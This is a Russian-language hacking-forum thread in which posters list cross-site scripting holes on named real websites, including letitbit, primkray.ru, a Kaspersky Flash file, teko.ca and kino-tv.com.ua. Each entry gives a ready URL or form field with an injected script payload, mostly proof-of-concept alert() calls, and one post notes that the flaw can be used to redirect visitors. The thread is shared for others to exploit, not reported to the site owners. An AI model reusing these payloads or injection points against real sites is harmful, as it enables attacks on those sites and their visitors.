активка в гостевой сайта Мульфильмы <img src="javascript:alert()"> Радио 20 (Активка) <img src="javascript:alert()"> Сайт Макса Фадеева (Активка ) "/><script>alert(/xss/)</script> активка в поле имя и фамилия "/><script>alert(/xss/)</script>
активка Ваще никакого фильтра нет, пролазит любой скрипт можно так сказать, да плюс еще сообщения дублируются трижды
Изволю себе запостить в этой теме Пассивную XSS на letitbit. Тему новую создавать не хочется, а сайт о огромный... Code: http://letitbit.net/tmpl/tmpl_frame_top.php?link="><script>alert()</script>
Code: [COLOR=Green]http://primkray.ru/sms/index.php[/COLOR] Active XSS in "Сообщение" Code: [COLOR=Green]http://primkray.ru/bazar/zn_fl/index.php?a=form&id=[/COLOR] Active XSS in "Сообщение"
http://www.kaspersky.com/downloads/flash/productlaunch.swf?productLaunch=javascript:alert(12345) Ну или просто редирект можно на нужную страницу сделать ))
forum.xakep.ru Можно реализовать с помошью махинаций с тегами , [video], не раскручивал, кому интересно, могут добить сами.
Code: http://www.teko.ca/board/topic.php?id=666 Code: name=Guest&comments=<script>alert('ANTICHAT FOREVER')</script>&email=human
Code: www.kino-tv.com.ua http://www.kino-tv.com.ua/catalog.php?item=1828&filter= Уязвимость - Оставьте комментарий Code: "><script>alert('ggg')<%2Fscript>